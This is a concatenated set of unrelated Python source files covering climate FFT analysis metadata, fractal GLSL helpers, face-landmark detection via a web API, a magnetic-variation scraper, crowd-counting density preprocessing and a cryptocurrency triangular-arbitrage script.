4803), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['PDO_freq', 'PDO_spec', 'PDO_fft']"}), "(columns=['PDO_freq', 'PDO_spec', 'PDO_fft'])\n", (4758, 4803), True, 'import pandas as pd\n'), ((4824, 4884), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['ENSO_freq', 'ENSO_spec', 'ENSO_fft']"}), "(columns=['ENSO_freq', 'ENSO_spec', 'ENSO_fft'])\n", (4836, 4884), True, 'import pandas as pd\n'), ((7778, 7807), 'SIO_modules.var_fft', 'SIO_mod.var_fft', (['temp_sampled'], {}), '(temp_sampled)\n', (7793, 7807), True, 'import SIO_modules as SIO_mod\n'), ((8099, 8135), 'numpy.conj', 'np.conj', (["spectra_ENSO_df['ENSO_fft']"], {}), "(spectra_ENSO_df['ENSO_fft'])\n", (8106, 8135), True, 'import numpy as np\n'), ((8615, 8664), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': 'NR', 'ncols': 'NC', 'figsize': '(10, 7)'}), '(nrows=NR, ncols=NC, figsize=(10, 7))\n', (8627, 8664), True, 'import matplotlib.pyplot as plt\n'), ((9965, 9996), 'matplotlib.pyplot.savefig', 'plt.savefig', (['(path_out + im_name)'], {}), '(path_out + im_name)\n', (9976, 9996), True, 'import matplotlib.pyplot as plt\n'), ((9997, 10007), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (10005, 10007), True, 'import matplotlib.pyplot as plt\n'), ((10457, 10491), 'numpy.conj', 'np.conj', (["spectra_PDO_df['PDO_fft']"], {}), "(spectra_PDO_df['PDO_fft'])\n", (10464, 10491), True, 'import numpy as np\n'), ((10833, 10882), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': 'NR', 'ncols': 'NC', 'figsize': '(10, 7)'}), '(nrows=NR, ncols=NC, figsize=(10, 7))\n', (10845, 10882), True, 'import matplotlib.pyplot as plt\n'), ((12181, 12212), 'matplotlib.pyplot.savefig', 'plt.savefig', (['(path_out + im_name)'], {}), '(path_out + im_name)\n', (12192, 12212), True, 'import matplotlib.pyplot as plt\n'), ((12213, 12223), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (12221, 12223), True, 'import matplotlib.pyplot as plt\n'), ((5409, 5438), 'SIO_modules.var_fft', 'SIO_mod.var_fft', (['data_sets[j]'], {}), '(data_sets[j])\n', (5424, 5438), True, 'import SIO_modules as SIO_mod\n'), ((6441, 6455), 'numpy.zeros', 'np.zeros', (['nmax'], {}), '(nmax)\n', (6449, 6455), True, 'import numpy as np\n'), ((6474, 6488), 'numpy.zeros', 'np.zeros', (['nmax'], {}), '(nmax)\n', (6482, 6488), True, 'import numpy as np\n'), ((6501, 6515), 'numpy.zeros', 'np.zeros', (['nmax'], {}), '(nmax)\n', (6509, 6515), True, 'import numpy as np\n'), ((7178, 7211), 'numpy.mean', 'np.mean', (['spectrum_amp[i:i + n_av]'], {}), '(spectrum_amp[i:i + n_av])\n', (7185, 7211), True, 'import numpy as np\n'), ((7233, 7268), 'numpy.mean', 'np.mean', (['spectrum_phase[i:i + n_av]'], {}), '(spectrum_phase[i:i + n_av])\n', (7240, 7268), True, 'import numpy as np\n'), ((6692, 6709), 'numpy.conj', 'np.conj', (['fft_var2'], {}), '(fft_var2)\n', (6699, 6709), True, 'import numpy as np\n'), ((6774, 6791), 'numpy.conj', 'np.conj', (['fft_var2'], {}), '(fft_var2)\n', (6781, 6791), True, 'import numpy as np\n')] |
import numpy as np
def normalize(x):
return x / np.linalg.norm(x)
def norm_sq(v):
return np.dot(v,v)
def norm(v):
return np.linalg.norm(v)
def get_sub_keys(v):
if type(v) is not tuple and type(v) is not list:
return []
return [k for k in v if type(k) is str]
def to_vec3(v):
if isinstance(v, (float, int)):
return np.array([v, v, v], dtype=np.float32)
elif len(get_sub_keys(v)) > 0:
return v
else:
return np.array([v[0], v[1], v[2]], dtype=np.float32)
def to_str(x):
if type(x) is bool:
return "1" if x else "0"
elif isinstance(x, (list, tuple)):
return vec3_str(x)
else:
return str(x)
def float_str(x):
if type(x) is str:
return '_' + x
else:
return str(x)
def vec3_str(v):
if type(v) is str:
return '_' + v
elif isinstance(v, (float, int)):
return 'vec3(' + str(v) + ')'
else:
return 'vec3(' + float_str(v[0]) + ',' + float_str(v[1]) + ',' + float_str(v[2]) + ')'
def vec3_eq(v, val):
if type(v) is str:
return False
for i in range(3):
if v[i] != val[i]:
return False
return True
def smin(a, b, k):
h = min(max(0.5 + 0.5*(b - a)/k, 0.0), 1.0)
return b*(1 - h) + a*h - k*h*(1.0 - h)
def get_global(k):
if type(k) is str:
return _mandelbruh_GLOBAL_VARS[k]
elif type(k) is tuple or type(k) is list:
return np.array([get_global(i) for i in k], dtype=np.float32)
else:
return k
def set_global_float(k):
if type(k) is str:
_mandelbruh_GLOBAL_VARS[k] = 0.0
return k
def set_global_vec3(k):
if type(k) is str:
_mandelbruh_GLOBAL_VARS[k] = to_vec3((0,0,0))
return k
elif isinstance(k, (float, int)):
return to_vec3(k)
else:
sk = get_sub_keys(k)
for i in sk:
_mandelbruh_GLOBAL_VARS[i] = 0.0
return to_vec3(k)
def cond_offset(p):
if type(p) is str or np.count_nonzero(p) > 0:
return ' - vec4(' + vec3_str(p) + ', 0)'
return ''
def cond_subtract(p):
if type(p) is str or p > 0:
return ' - ' + float_str(p)
return ''
def make_color(geo):
if type(geo.color) is tuple or type(geo.color) is np.ndarray:
return 'vec4(' + vec3_str(geo.color) + ', ' + geo.glsl() + ')'
elif geo.color == 'orbit' or geo.color == 'o':
return 'vec4(orbit, ' + geo.glsl() + ')'
else:
raise Exception("Invalid coloring type")
_mandelbruh_GLOBAL_VARS = {}
| [
"numpy.count_nonzero",
"numpy.array",
"numpy.dot",
"numpy.linalg.norm"
]
| [((93, 105), 'numpy.dot', 'np.dot', (['v', 'v'], {}), '(v, v)\n', (99, 105), True, 'import numpy as np\n'), ((127, 144), 'numpy.linalg.norm', 'np.linalg.norm', (['v'], {}), '(v)\n', (141, 144), True, 'import numpy as np\n'), ((50, 67), 'numpy.linalg.norm', 'np.linalg.norm', (['x'], {}), '(x)\n', (64, 67), True, 'import numpy as np\n'), ((329, 366), 'numpy.array', 'np.array', (['[v, v, v]'], {'dtype': 'np.float32'}), '([v, v, v], dtype=np.float32)\n', (337, 366), True, 'import numpy as np\n'), ((426, 472), 'numpy.array', 'np.array', (['[v[0], v[1], v[2]]'], {'dtype': 'np.float32'}), '([v[0], v[1], v[2]], dtype=np.float32)\n', (434, 472), True, 'import numpy as np\n'), ((1741, 1760), 'numpy.count_nonzero', 'np.count_nonzero', (['p'], {}), '(p)\n', (1757, 1760), True, 'import numpy as np\n')] |
"""
recognize face landmark
"""
import json
import os
import requests
import numpy as np
FACE_POINTS = list(range(0, 83))
JAW_POINTS = list(range(0, 19))
LEFT_EYE_POINTS = list(range(19, 29))
LEFT_BROW_POINTS = list(range(29, 37))
MOUTH_POINTS = list(range(37, 55))
NOSE_POINTS = list(range(55, 65))
RIGHT_EYE_POINTS = list(range(65, 75))
RIGHT_BROW_POINTS = list(range(75, 83))
LEFT_FACE = list(range(0, 10)) + list(range(29, 34))
RIGHT_FACE = list(range(9, 19)) + list(range(75, 80))
JAW_END = 19
FACE_START = 0
FACE_END = 83
OVERLAY_POINTS = [
LEFT_FACE,
RIGHT_FACE,
JAW_POINTS,
]
def face_points(image):
points = []
txt = image + '.txt'
if os.path.isfile(txt):
with open(txt) as file:
for line in file:
points = line
elif os.path.isfile(image):
points = landmarks_by_face__(image)
with open(txt, 'w') as file:
file.write(str(points))
faces = json.loads(points)['faces']
if len(faces) == 0:
err = 404
else:
err = 0
matrix_list = np.matrix(matrix_marks(faces[0]['landmark']))
point_list = []
for p in matrix_list.tolist():
point_list.append((int(p[0]), int(p[1])))
return matrix_list, point_list, err
def landmarks_by_face__(image):
url = 'https://api-cn.faceplusplus.com/facepp/v3/detect'
params = {
'api_key': '<KEY>',
'api_secret': '<KEY>',
'return_landmark': 1,
}
file = {'image_file': open(image, 'rb')}
r = requests.post(url=url, files=file, data=params)
if r.status_code == requests.codes.ok:
return r.content.decode('utf-8')
else:
return r.content
def matrix_rectangle(left, top, width, height):
pointer = [
(left, top),
(left + width / 2, top),
(left + width - 1, top),
(left + width - 1, top + height / 2),
(left, top + height / 2),
(left, top + height - 1),
(left + width / 2, top + height - 1),
(left + width - 1, top + height - 1)
]
return pointer
def matrix_marks(res):
pointer = [
[res['contour_left1']['x'], res['contour_left1']['y']],
[res['contour_left2']['x'], res['contour_left2']['y']],
[res['contour_left3']['x'], res['contour_left3']['y']],
[res['contour_left4']['x'], res['contour_left4']['y']],
[res['contour_left5']['x'], res['contour_left5']['y']],
[res['contour_left6']['x'], res['contour_left6']['y']],
[res['contour_left7']['x'], res['contour_left7']['y']],
[res['contour_left8']['x'], res['contour_left8']['y']],
[res['contour_left9']['x'], res['contour_left9']['y']],
[res['contour_chin']['x'], res['contour_chin']['y']],
[res['contour_right9']['x'], res['contour_right9']['y']],
[res['contour_right8']['x'], res['contour_right8']['y']],
[res['contour_right7']['x'], res['contour_right7']['y']],
[res['contour_right6']['x'], res['contour_right6']['y']],
[res['contour_right5']['x'], res['contour_right5']['y']],
[res['contour_right4']['x'], res['contour_right4']['y']],
[res['contour_right3']['x'], res['contour_right3']['y']],
[res['contour_right2']['x'], res['contour_right2']['y']],
[res['contour_right1']['x'], res['contour_right1']['y']],
[res['left_eye_bottom']['x'], res['left_eye_bottom']['y']],
[res['left_eye_center']['x'], res['left_eye_center']['y']],
[res['left_eye_left_corner']['x'], res['left_eye_left_corner']['y']],
[res['left_eye_lower_left_quarter']['x'], res['left_eye_lower_left_quarter']['y']],
[res['left_eye_lower_right_quarter']['x'], res['left_eye_lower_right_quarter']['y']],
[res['left_eye_pupil']['x'], res['left_eye_pupil']['y']],
[res['left_eye_right_corner']['x'], res['left_eye_right_corner']['y']],
[res['left_eye_top']['x'], res['left_eye_top']['y']],
[res['left_eye_upper_left_quarter']['x'], res['left_eye_upper_left_quarter']['y']],
[res['left_eye_upper_right_quarter']['x'], res['left_eye_upper_right_quarter']['y']],
[res['left_eyebrow_left_corner']['x'], res['left_eyebrow_left_corner']['y']],
[res['left_eyebrow_upper_left_quarter']['x'], res['left_eyebrow_upper_left_quarter']['y']],
[res['left_eyebrow_upper_middle']['x'], res['left_eyebrow_upper_middle']['y']],
[res['left_eyebrow_upper_right_quarter']['x'], res['left_eyebrow_upper_right_quarter']['y']],
[res['left_eyebrow_right_corner']['x'], res['left_eyebrow_right_corner']['y']],
[res['left_eyebrow_lower_left_quarter']['x'], res['left_eyebrow_lower_left_quarter']['y']],
[res['left_eyebrow_lower_middle']['x'], res['left_eyebrow_lower_middle']['y']],
[res['left_eyebrow_lower_right_quarter']['x'], res['left_eyebrow_lower_right_quarter']['y']],
[res['mouth_left_corner']['x'], res['mouth_left_corner']['y']],
[res['mouth_lower_lip_bottom']['x'], res['mouth_lower_lip_bottom']['y']],
[res['mouth_lower_lip_left_contour1']['x'], res['mouth_lower_lip_left_contour1']['y']],
[res['mouth_lower_lip_left_contour2']['x'], res['mouth_lower_lip_left_contour2']['y']],
[res['mouth_lower_lip_left_contour3']['x'], res['mouth_lower_lip_left_contour3']['y']],
[res['mouth_lower_lip_right_contour1']['x'], res['mouth_lower_lip_right_contour1']['y']],
[res['mouth_lower_lip_right_contour2']['x'], res['mouth_lower_lip_right_contour2']['y']],
[res['mouth_lower_lip_right_contour3']['x'], res['mouth_lower_lip_right_contour3']['y']],
[res['mouth_lower_lip_top']['x'], res['mouth_lower_lip_top']['y']],
[res['mouth_right_corner']['x'], res['mouth_right_corner']['y']],
[res['mouth_upper_lip_bottom']['x'], res['mouth_upper_lip_bottom']['y']],
[res['mouth_upper_lip_left_contour1']['x'], res['mouth_upper_lip_left_contour1']['y']],
[res['mouth_upper_lip_left_contour2']['x'], res['mouth_upper_lip_left_contour2']['y']],
[res['mouth_upper_lip_left_contour3']['x'], res['mouth_upper_lip_left_contour3']['y']],
[res['mouth_upper_lip_right_contour1']['x'], res['mouth_upper_lip_right_contour1']['y']],
[res['mouth_upper_lip_right_contour2']['x'], res['mouth_upper_lip_right_contour2']['y']],
[res['mouth_upper_lip_right_contour3']['x'], res['mouth_upper_lip_right_contour3']['y']],
[res['mouth_upper_lip_top']['x'], res['mouth_upper_lip_top']['y']],
[res['nose_contour_left1']['x'], res['nose_contour_left1']['y']],
[res['nose_contour_left2']['x'], res['nose_contour_left2']['y']],
[res['nose_contour_left3']['x'], res['nose_contour_left3']['y']],
[res['nose_contour_lower_middle']['x'], res['nose_contour_lower_middle']['y']],
[res['nose_contour_right1']['x'], res['nose_contour_right1']['y']],
[res['nose_contour_right2']['x'], res['nose_contour_right2']['y']],
[res['nose_contour_right3']['x'], res['nose_contour_right3']['y']],
[res['nose_left']['x'], res['nose_left']['y']],
[res['nose_right']['x'], res['nose_right']['y']],
[res['nose_tip']['x'], res['nose_tip']['y']],
[res['right_eye_bottom']['x'], res['right_eye_bottom']['y']],
[res['right_eye_center']['x'], res['right_eye_center']['y']],
[res['right_eye_left_corner']['x'], res['right_eye_left_corner']['y']],
[res['right_eye_lower_left_quarter']['x'], res['right_eye_lower_left_quarter']['y']],
[res['right_eye_lower_right_quarter']['x'], res['right_eye_lower_right_quarter']['y']],
[res['right_eye_pupil']['x'], res['right_eye_pupil']['y']],
[res['right_eye_right_corner']['x'], res['right_eye_right_corner']['y']],
[res['right_eye_top']['x'], res['right_eye_top']['y']],
[res['right_eye_upper_left_quarter']['x'], res['right_eye_upper_left_quarter']['y']],
[res['right_eye_upper_right_quarter']['x'], res['right_eye_upper_right_quarter']['y']],
[res['right_eyebrow_left_corner']['x'], res['right_eyebrow_left_corner']['y']],
[res['right_eyebrow_upper_left_quarter']['x'], res['right_eyebrow_upper_left_quarter']['y']],
[res['right_eyebrow_upper_middle']['x'], res['right_eyebrow_upper_middle']['y']],
[res['right_eyebrow_upper_right_quarter']['x'], res['right_eyebrow_upper_right_quarter']['y']],
[res['right_eyebrow_right_corner']['x'], res['right_eyebrow_right_corner']['y']],
[res['right_eyebrow_lower_left_quarter']['x'], res['right_eyebrow_lower_left_quarter']['y']],
[res['right_eyebrow_lower_middle']['x'], res['right_eyebrow_lower_middle']['y']],
[res['right_eyebrow_lower_right_quarter']['x'], res['right_eyebrow_lower_right_quarter']['y']],
]
return pointer
| [
"os.path.isfile",
"json.loads",
"requests.post"
]
| [((676, 695), 'os.path.isfile', 'os.path.isfile', (['txt'], {}), '(txt)\n', (690, 695), False, 'import os\n'), ((1519, 1566), 'requests.post', 'requests.post', ([], {'url': 'url', 'files': 'file', 'data': 'params'}), '(url=url, files=file, data=params)\n', (1532, 1566), False, 'import requests\n'), ((798, 819), 'os.path.isfile', 'os.path.isfile', (['image'], {}), '(image)\n', (812, 819), False, 'import os\n'), ((951, 969), 'json.loads', 'json.loads', (['points'], {}), '(points)\n', (961, 969), False, 'import json\n')] |
import requests
import time
from bs4 import BeautifulSoup
import re
def decdeg2dms(dd):
negative = dd < 0
dd = abs(dd)
minutes,seconds = divmod(dd*3600,60)
degrees,minutes = divmod(minutes,60)
if negative:
if degrees > 0:
degrees = -degrees
elif minutes > 0:
minutes = -minutes
else:
seconds = -seconds
return (degrees,minutes,seconds)
def get_mag_var(lat, lon, year, month, day, elev=0):
"""Returns the magnetic variation at a particulat point on earth.
Keyword Arguments
lat -- latitude (e.g. -180.6 deg)
lon -- longitude (e.g. -34.6 deg)
elev -- elevation in km (default 0.0)
year -- year (e.g. 2015)
month -- month (e.g. 11)
day -- day (e.g. 30)
Returns
float -- magnetic variation
"""
(latd, latm, lats) = decdeg2dms(lat)
(lond, lonm, lons) = decdeg2dms(lon)
payload = {'latd': latd,'latm':latm,'lats':lats,'lond':lond,'lonm':lonm,
'lons':lons,'elev':elev,'year':year,'month':month,'day':day,'Ein':'D'}
url = 'http://www.ga.gov.au/oracle/cgi/geoAGRF.sh'
# Sleep to avoid spamming server
time.sleep(1)
r = requests.get(url, params=payload)
if r.status_code == 200:
c = r.content
soup = BeautifulSoup(c,'html.parser')
deg_text = soup.find_all('b')[-1].text.strip()
# strip out the junk so we have a number
# Strip spaces before the search
deg_text = deg_text.replace(" ","")
deg = re.search(r'D=(.*?)deg', deg_text).group(1)
deg = float(deg)
return deg
else:
return 'something went wrong' | [
"bs4.BeautifulSoup",
"requests.get",
"time.sleep",
"re.search"
]
| [((1154, 1167), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (1164, 1167), False, 'import time\n'), ((1177, 1210), 'requests.get', 'requests.get', (['url'], {'params': 'payload'}), '(url, params=payload)\n', (1189, 1210), False, 'import requests\n'), ((1277, 1308), 'bs4.BeautifulSoup', 'BeautifulSoup', (['c', '"""html.parser"""'], {}), "(c, 'html.parser')\n", (1290, 1308), False, 'from bs4 import BeautifulSoup\n'), ((1511, 1544), 're.search', 're.search', (['"""D=(.*?)deg"""', 'deg_text'], {}), "('D=(.*?)deg', deg_text)\n", (1520, 1544), False, 'import re\n')] |
# -*- coding:utf-8 -*-
# ------------------------
# written by <NAME>
# 2018-10
# ------------------------
import os
import skimage.io
from skimage.color import rgb2gray
import skimage.transform
from scipy.io import loadmat
import numpy as np
import cv2
import math
import warnings
import random
import torch
import matplotlib.pyplot as plt
warnings.filterwarnings("ignore")
def gaussian_kernel(image, points):
image_density = np.zeros(image.shape)
h, w = image_density.shape
if len(points) == 0:
return image_density
for j in range(len(points)):
f_sz = 15
sigma = 4.0
# convert x, y to int
x = min(w, max(0, int(points[j, 0])))
y = min(h, max(0, int(points[j, 1])))
gap = f_sz // 2
x1 = x - gap if x - gap > 0 else 0
x2 = x + gap if x + gap < w else w - 1
y1 = y - gap if y - gap > 0 else 0
y2 = y + gap if y + gap < h else h - 1
# generate 2d gaussian kernel
kx = cv2.getGaussianKernel(y2 - y1 + 1, sigma=sigma)
ky = cv2.getGaussianKernel(x2 - x1 + 1, sigma=sigma)
gaussian = np.multiply(kx, ky.T)
image_density[y1:y2 + 1, x1:x2 + 1] += gaussian
return image_density
def extract_data(mode="train", patch_number=9, part="A"):
num_images = 300 if mode=="train" else 182
# original path
dataset_path = "../data/original/part_{0}_final/".format(part)
mode_data = os.path.join(dataset_path, "{0}_data".format(mode))
mode_images = os.path.join(mode_data, "images")
mode_ground_truth = os.path.join(mode_data, "ground_truth")
# preprocessed path
preprocessed_mode = "../data/preprocessed/{0}/".format(mode)
preprocessed_mode_density = "../data/preprocessed/{0}_density/".format(mode)
if not os.path.exists("../data/preprocessed/"):
os.mkdir("../data/preprocessed/")
if not os.path.exists(preprocessed_mode):
os.mkdir(preprocessed_mode)
if not os.path.exists(preprocessed_mode_density):
os.mkdir(preprocessed_mode_density)
# convert images to gray-density for each
for index in range(1, num_images + 1):
if index % 10 == 9:
print("{0} images have been processed".format(index + 1))
image_path = os.path.join(mode_images, "IMG_{0}.jpg".format(index))
ground_truth_path = os.path.join(mode_ground_truth, "GT_IMG_{0}.mat".format(index))
image = skimage.io.imread(image_path)
# convert to gray map
if image.shape[-1] == 3:
image = rgb2gray(image)
mat = loadmat(ground_truth_path)
image_info = mat["image_info"]
ann_points = image_info[0][0][0][0][0]
# gaussian transfer
image_density = gaussian_kernel(image, ann_points)
# split image into 9 patches where patch is 1/4 size
h, w = image.shape
w_block = math.floor(w / 8)
h_block = math.floor(h / 8)
for j in range(patch_number):
x = math.floor((w - 2 * w_block) * random.random() + w_block)
y = math.floor((h - 2 * h_block) * random.random() + h_block)
image_sample = image[y - h_block:y + h_block, x - w_block:x + w_block]
image_density_sample = image_density[y - h_block:y + h_block, x - w_block:x + w_block]
img_idx = "{0}_{1}".format(index, j)
np.save(os.path.join(preprocessed_mode_density, "{0}.npy".format(img_idx)), image_density_sample)
skimage.io.imsave(os.path.join(preprocessed_mode, "{0}.jpg".format(img_idx)), image_sample)
def extract_test_data(part="A"):
num_images = 183 if part == "A" else 317
test_data_path = "../data/original/part_{part}_final/test_data/images".format(part=part)
test_ground_path = "../data/original/part_{part}_final/test_data/ground_truth".format(part=part)
test_density_path = "../data/preprocessed/test_density"
print("create directory........")
if not os.path.exists(test_density_path):
os.mkdir(test_density_path)
print("begin to preprocess test data........")
for index in range(1, num_images):
if index % 10 == 0:
print("{num} images are done".format(num=index))
image_path = os.path.join(test_data_path, "IMG_{0}.jpg".format(index))
ground_truth_path = os.path.join(test_ground_path, "GT_IMG_{0}.mat".format(index))
# load mat and image
image = skimage.io.imread(image_path)
if image.shape[-1] == 3:
image = rgb2gray(image)
mat = loadmat(ground_truth_path)
image_info = mat["image_info"]
# ann_points: points pixels mean people
# number: number of people in the image
ann_points = image_info[0][0][0][0][0]
number = image_info[0][0][0][0][1]
h = float(image.shape[0])
w = float(image.shape[1])
# convert images to density
image_density = gaussian_kernel(image, ann_points)
np.save(os.path.join(test_density_path, "IMG_{0}.npy".format(index)), image_density)
extract_test_data()
| [
"os.path.exists",
"numpy.multiply",
"skimage.color.rgb2gray",
"math.floor",
"scipy.io.loadmat",
"os.path.join",
"cv2.getGaussianKernel",
"numpy.zeros",
"os.mkdir",
"random.random",
"warnings.filterwarnings"
]
| [((342, 375), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (365, 375), False, 'import warnings\n'), ((434, 455), 'numpy.zeros', 'np.zeros', (['image.shape'], {}), '(image.shape)\n', (442, 455), True, 'import numpy as np\n'), ((1505, 1538), 'os.path.join', 'os.path.join', (['mode_data', '"""images"""'], {}), "(mode_data, 'images')\n", (1517, 1538), False, 'import os\n'), ((1563, 1602), 'os.path.join', 'os.path.join', (['mode_data', '"""ground_truth"""'], {}), "(mode_data, 'ground_truth')\n", (1575, 1602), False, 'import os\n'), ((992, 1039), 'cv2.getGaussianKernel', 'cv2.getGaussianKernel', (['(y2 - y1 + 1)'], {'sigma': 'sigma'}), '(y2 - y1 + 1, sigma=sigma)\n', (1013, 1039), False, 'import cv2\n'), ((1053, 1100), 'cv2.getGaussianKernel', 'cv2.getGaussianKernel', (['(x2 - x1 + 1)'], {'sigma': 'sigma'}), '(x2 - x1 + 1, sigma=sigma)\n', (1074, 1100), False, 'import cv2\n'), ((1120, 1141), 'numpy.multiply', 'np.multiply', (['kx', 'ky.T'], {}), '(kx, ky.T)\n', (1131, 1141), True, 'import numpy as np\n'), ((1784, 1823), 'os.path.exists', 'os.path.exists', (['"""../data/preprocessed/"""'], {}), "('../data/preprocessed/')\n", (1798, 1823), False, 'import os\n'), ((1833, 1866), 'os.mkdir', 'os.mkdir', (['"""../data/preprocessed/"""'], {}), "('../data/preprocessed/')\n", (1841, 1866), False, 'import os\n'), ((1878, 1911), 'os.path.exists', 'os.path.exists', (['preprocessed_mode'], {}), '(preprocessed_mode)\n', (1892, 1911), False, 'import os\n'), ((1921, 1948), 'os.mkdir', 'os.mkdir', (['preprocessed_mode'], {}), '(preprocessed_mode)\n', (1929, 1948), False, 'import os\n'), ((1960, 2001), 'os.path.exists', 'os.path.exists', (['preprocessed_mode_density'], {}), '(preprocessed_mode_density)\n', (1974, 2001), False, 'import os\n'), ((2011, 2046), 'os.mkdir', 'os.mkdir', (['preprocessed_mode_density'], {}), '(preprocessed_mode_density)\n', (2019, 2046), False, 'import os\n'), ((2562, 2588), 'scipy.io.loadmat', 'loadmat', (['ground_truth_path'], {}), '(ground_truth_path)\n', (2569, 2588), False, 'from scipy.io import loadmat\n'), ((2868, 2885), 'math.floor', 'math.floor', (['(w / 8)'], {}), '(w / 8)\n', (2878, 2885), False, 'import math\n'), ((2904, 2921), 'math.floor', 'math.floor', (['(h / 8)'], {}), '(h / 8)\n', (2914, 2921), False, 'import math\n'), ((3937, 3970), 'os.path.exists', 'os.path.exists', (['test_density_path'], {}), '(test_density_path)\n', (3951, 3970), False, 'import os\n'), ((3980, 4007), 'os.mkdir', 'os.mkdir', (['test_density_path'], {}), '(test_density_path)\n', (3988, 4007), False, 'import os\n'), ((4517, 4543), 'scipy.io.loadmat', 'loadmat', (['ground_truth_path'], {}), '(ground_truth_path)\n', (4524, 4543), False, 'from scipy.io import loadmat\n'), ((2532, 2547), 'skimage.color.rgb2gray', 'rgb2gray', (['image'], {}), '(image)\n', (2540, 2547), False, 'from skimage.color import rgb2gray\n'), ((4487, 4502), 'skimage.color.rgb2gray', 'rgb2gray', (['image'], {}), '(image)\n', (4495, 4502), False, 'from skimage.color import rgb2gray\n'), ((3007, 3022), 'random.random', 'random.random', ([], {}), '()\n', (3020, 3022), False, 'import random\n'), ((3081, 3096), 'random.random', 'random.random', ([], {}), '()\n', (3094, 3096), False, 'import random\n')] |
# coding: utf-8
from bigone import BigOneDog
from common import gen_logger
import logging
import time
import json
def strategy_eth_big_bnc_eth(dog):
"""
正向:买BIG/ETH -> 卖BIG/BNC -> 买ETH/BNC
反向:卖ETH/BNC -> 买BIG/BNC -> 卖BIG/ETH
:param dog: implemention of BigOneDog
:return: 正向收益率,反向收益率
"""
big_eth_data = dog.get_order_book('BIG-ETH')
big_bnc_data = dog.get_order_book('BIG-BNC')
eth_bnc_data = dog.get_order_book('ETH-BNC')
print('BIG-ETH')
print('卖一', big_eth_data['asks'][0]['price'], big_eth_data['asks'][0]['amount'])
print('买一', big_eth_data['bids'][0]['price'], big_eth_data['bids'][0]['amount'])
print('BIG-BNC')
print('卖一', big_bnc_data['asks'][0]['price'], big_bnc_data['asks'][0]['amount'])
print('买一', big_bnc_data['bids'][0]['price'], big_bnc_data['bids'][0]['amount'])
print('ETH-BNC')
print('卖一', eth_bnc_data['asks'][0]['price'], eth_bnc_data['asks'][0]['amount'])
print('买一', eth_bnc_data['bids'][0]['price'], eth_bnc_data['bids'][0]['amount'])
# positive transaction
pos_anc = 0.999*0.999*0.999*\
((1 / (float(big_eth_data['asks'][0]['price'])))
* float(big_bnc_data['bids'][0]['price']) )
pos_anc = pos_anc / float(eth_bnc_data['asks'][0]['price']) - 1
# negative transaction
neg_anc = 0.999 * 0.999 * 0.999 * \
(float(eth_bnc_data['bids'][0]['price'])
/ float(big_bnc_data['asks'][0]['price'])
* float(big_eth_data['asks'][0]['price']))
neg_anc = neg_anc / 1 - 1
flag = False
amt = 2.0
if float(big_eth_data['asks'][0]['amount']) >= amt:
if float(big_bnc_data['bids'][0]['amount']) >= amt:
if float(eth_bnc_data['asks'][0]['amount']) >= amt * float(big_eth_data['asks'][0]['price']):
flag = True
msg = "预期本次[正向套利:买BIG/ETH -> 卖BIG/BNC -> 买ETH/BNC]利润:"
if pos_anc < 0.01:
result = "利润空间小于1%, 放弃本次套利 0"
logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result))
else:
result = "利润空间大于1%"
if flag is False:
result = "{},{}".format(result,"量不足, 放弃本次套利 0")
logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result))
else:
result = "{},{}".format(result,"执行本次套利 1")
logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result))
print("{} {} {} {}".format('BIG-ETH','BID', big_eth_data['asks'][0]['price'], str(amt)))
print("{} {} {} {}".format('BIG-BNC','ASK', big_bnc_data['bids'][0]['price'], str(amt)))
print("{} {} {} {}".format('ETH-BNC','BID', eth_bnc_data['asks'][0]['price'],
str(amt * float(big_eth_data['asks'][0]['price']))))
# dog.create_order('BIG-ETH','ASK', big_eth_data['asks'][0]['price'], '2.0')
# dog.create_order('BIG-BNC','BID', big_bnc_data['bids'][0]['price'], '2.0')
# dog.create_order('ETH-BNC','ASK', eth_bnc_data['asks'][0]['price'],
# str(2.0 * float(big_eth_data['asks'][0]['price'])))
return True
if neg_anc < 0.01:
result = "利润空间小于1%, 放弃本次套利 0"
else:
result = "利润空间大于1%, 执行本次套利 1"
logger.info("预期本次[反向套利:卖ETH/BNC -> 买BIG/BNC -> 卖BIG/ETH]利润: {0:.2f}%, {1}".format(neg_anc*100,result))
return False
# return pos_anc, neg_anc
def strategy_eth_bnc(dog):
eth_bnc_data = dog.get_order_book('ETH-BNC')
print('ETH-BNC')
print('卖一', eth_bnc_data['asks'][0]['price'], eth_bnc_data['asks'][0]['amount'])
print('买一', eth_bnc_data['bids'][0]['price'], eth_bnc_data['bids'][0]['amount'])
anc = float(eth_bnc_data['asks'][0]['price']) / float(eth_bnc_data['bids'][0]['price']) - 1
print(anc)
if anc > 0.02:
r = dog.create_order('ETH-BNC', 'BID', str(float(eth_bnc_data['bids'][0]['price'])+0.01), '0.01' )
bid_order_id = r['order_id']
r = dog.create_order('ETH-BNC', 'ASK', str(float(eth_bnc_data['asks'][0]['price'])-0.01), '0.01' )
ask_order_id = r['order_id']
return anc, anc
if __name__ == '__main__':
gen_logger('bigonetest')
logger = logging.getLogger("bigone")
with open("PRIVATE_KEY.json",'r') as f:
private_key = json.load(f)["key"]
dog = BigOneDog(private_key)
# strategy_eth_bnc(dog)
# dog.get_orders("ETH-BNC",'10')
# r = dog.get_order("b79ef031-c477-46f9-b452-7e97aa97435d")
# print(r)
# r = dog.get_orders('ETH-BNC','10')
# print(r)
while True:
flag = strategy_eth_big_bnc_eth(dog)
if flag is True:
break
else:
print("休眠10秒")
print("")
time.sleep(10)
# break
# pos_anc, neg_anc = strategy_eth_bnc(dog)
# if pos_anc < 0.01:
# result = "利润空间小于1%, 放弃本次套利 0"
# else:
# result = "利润空间大于1%, 执行本次套利 1"
#
# logger.info("预期本次[正向套利:买BIG/ETH -> 卖BIG/BNC -> 买ETH/BNC]利润: {0:.2f}%, {1}".format(pos_anc*100,result))
#
# if neg_anc < 0.01:
# result = "利润空间小于1%, 放弃本次套利 0"
# else:
# result = "利润空间大于1%, 执行本次套利 1"
#
